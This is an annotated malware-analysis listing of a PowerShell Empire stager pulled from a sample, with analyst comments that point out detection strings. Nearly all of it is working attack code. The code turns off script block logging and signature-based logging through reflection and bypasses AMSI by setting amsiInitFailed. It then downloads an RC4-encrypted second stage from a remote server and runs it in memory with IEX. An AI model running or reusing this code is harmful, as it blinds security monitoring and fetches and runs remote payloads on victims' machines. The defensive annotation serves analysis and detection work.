LabTestHttp.ps1

# PowerShell script (PowerShell Empire stager) extracted from LabTestHttp.exe (8197cbc3b58027122f9de6d17feb004cb671ba9d35c0a157e8cfd86f37360e60)
# https://www.virustotal.com/#/file/8197cbc3b58027122f9de6d17feb004cb671ba9d35c0a157e8cfd86f37360e60/details
#
# Analyst annotations (defensive reading of the listing). The stager has three
# parts: (1) in-process tampering with PowerShell's own script block logging and
# AMSI state, (2) an RC4 routine plus a fixed staging key, and (3) an HTTP fetch of
# an encrypted second stage that is decrypted and executed in memory via IEX, so
# nothing beyond this stager touches disk. The random casing, the backtick-split
# method name ("GETFie`LD") and the 'a' + 'b' string splitting throughout are
# obfuscation against naive string matching; the split fragments themselves
# ('ScriptB' + 'lockLogging', 'N' + 'onPublic,Static') are usable detection strings.

# Logging/AMSI tampering only runs on PowerShell 3.0 or newer.
If ($PSVeRSionTable.PSVersIoN.MAjor -gE 3)
{
    # Reflection: grab the private static field that caches Group Policy settings
    # inside the PowerShell engine. 'N' + 'onPublic,Static' is BindingFlags
    # 'NonPublic,Static' split in two to dodge signatures.
    $GPF = [REF].ASSemblY.GEtTyPE('System.Management.Automation.Utils')."GETFie`LD"('cachedGroupPolicySettings', 'N' + 'onPublic,Static');
    IF ($GPF)
    {
        $GPC = $GPF.GEtVAluE($NulL);
        # If a ScriptBlockLogging policy is already cached, zero both switches in
        # the in-memory copy. No registry write happens here, so registry auditing
        # will not observe it; only the current process is affected.
        If ($GPC['ScriptB' + 'lockLogging'])
        {
            $GPC['ScriptB' + 'lockLogging']['EnableScriptB' + 'lockLogging'] = 0;
            $GPC['ScriptB' + 'lockLogging']['EnableScriptBlockInvocationLogging'] = 0
        }
        # Also plant a "disabled" entry keyed by the HKLM policy path, presumably so
        # a later lookup that misses the entry above still resolves to 0/0.
        $val = [COLlecTionS.GeNERic.DIctIoNARY[STrIng, SYStEm.ObJeCt]]::NEw();
        $VAl.ADD('EnableScriptB' + 'lockLogging', 0);
        $VAl.AdD('EnableScriptBlockInvocationLogging', 0);
        $GPC['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB' + 'lockLogging'] = $VAL
        # NOTE(review): this tampering runs after the stager's own script block has
        # already been compiled, so where script block logging was enabled beforehand
        # the 4104 event for this block itself is still expected to be recorded --
        # treat that as the primary detection point; confirm on the host's PS version.
    }
    ElSE
    {
        # Fallback when the policy-cache field is absent: replace [ScriptBlock]'s
        # private static 'signatures' set (the engine's list of suspicious-content
        # patterns) with an empty HashSet, so heuristic "suspicious script" logging
        # has nothing left to match on.
        [SCRiPtBLOCk]."GEtFie`ld"('signatures', 'N' + 'onPublic,Static').SeTVAlue($NuLl, (NEW-ObJECt CoLLEcTIoNs.GENERIc.HASHSeT[STriNG]))
    }
    # AMSI: set AmsiUtils.amsiInitFailed = $true so the engine believes AMSI failed to
    # initialise and skips scanning later content (the decrypted stage below). The
    # ?{ $_ } filter silently skips hosts whose PowerShell has no AmsiUtils type.
    # The 'amsiInitFailed' field name is a widely used detection string for this.
    [Ref].ASSeMblY.GeTTYPe('System.Management.Automation.AmsiUtils') | ?{ $_ } | %{ $_.GetFieLd('amsiInitFailed', 'NonPublic,Static').SETVaLuE($nuLl, $TRue) };
};

# --- Network setup ---------------------------------------------------------------
# Disable the HTTP "Expect: 100-continue" handshake for the WebClient requests below.
[SYSteM.NEt.SerVicEPoinTMaNAger]::EXPECT100CoNTiNUe = 0;
$wc = New-ObjeCt SYSTem.Net.WEbClIEnT;
# Fixed, browser-like User-Agent (IE11 on Windows 7). A PowerShell process emitting
# exactly this UA string is a useful proxy-log pivot for hunting.
$u = 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';
$Wc.HeAdErs.ADd('User-Agent', $u);
# Use the system default proxy with the logged-on user's default network
# credentials, so the fetch works through authenticated corporate proxies.
$Wc.PRoxY = [SYstem.NeT.WEBReQueSt]::DeFaultWEbProXY;
$WC.ProxY.CReDeNtiAlS = [SYSTEm.Net.CrEDenTIAlCacHE]::DefAuLtNeTWorKCredENTIALS;
$Script:Proxy = $wc.Proxy;

# --- Crypto ----------------------------------------------------------------------
# $K is the 32-byte staging key, embedded in clear text as an ASCII string.
$K = [SYSTem.TeXT.ENCODInG]::ASCII.GEtByTEs('x,ZTvr?M[W%8dw7)aIP>*<Opy6hH0Qg|');
# $R is an RC4 implementation: args are (data, key). Line 1 is the key-scheduling
# step over a 0..255 state array; line 2 generates the keystream and XORs it into
# each data byte. $J, $I and $H are never initialised and rely on $null -> 0.
$R = {
    $D, $K = $ARGs; $S = 0 .. 255; 0 .. 255 | %{ $J = ($J + $S[$_] + $K[$_ % $K.CouNT]) % 256; $S[$_], $S[$J] = $S[$J], $S[$_] };
    $D | %{ $I = ($I + 1) % 256; $H = ($H + $S[$I]) % 256; $S[$I], $S[$H] = $S[$H], $S[$I]; $_ -BXoR $S[($S[$I] + $S[$H]) % 256] }
};

# --- Staging request -------------------------------------------------------------
# Staging server is an RFC1918 address on port 8080 (consistent with a lab build,
# as the file name suggests); the URI mimics a web login endpoint.
$ser = 'http://192.168.50.68:8080';
$t = '/login/process.php';
# Fixed "session" cookie, presumably the per-build staging identifier the server
# uses to hand out the matching second stage. Cookie value + UA + path together
# make a tight network signature for this particular build.
$wc.HeAders.Add("Cookie", "session=U1IMmdBupBXJMDz0Ondvr8vK0Ac=");
$dAtA = $WC.DOwNLoAdDATa($SEr + $T);
# Response layout: first 4 bytes are an IV that is prepended to the staging key;
# the remainder is the RC4-encrypted second stage.
$iV = $DatA[0 .. 3];
# Decrypt in memory, turn the bytes into a string and hand it straight to IEX.
# Nothing is written to disk; the decrypted stage only exists in this process.
$data = $DATa[4 .. $dATA.LENgTH]; -jOIn [Char[]](& $R $DATA ($IV + $K)) | IEX
exit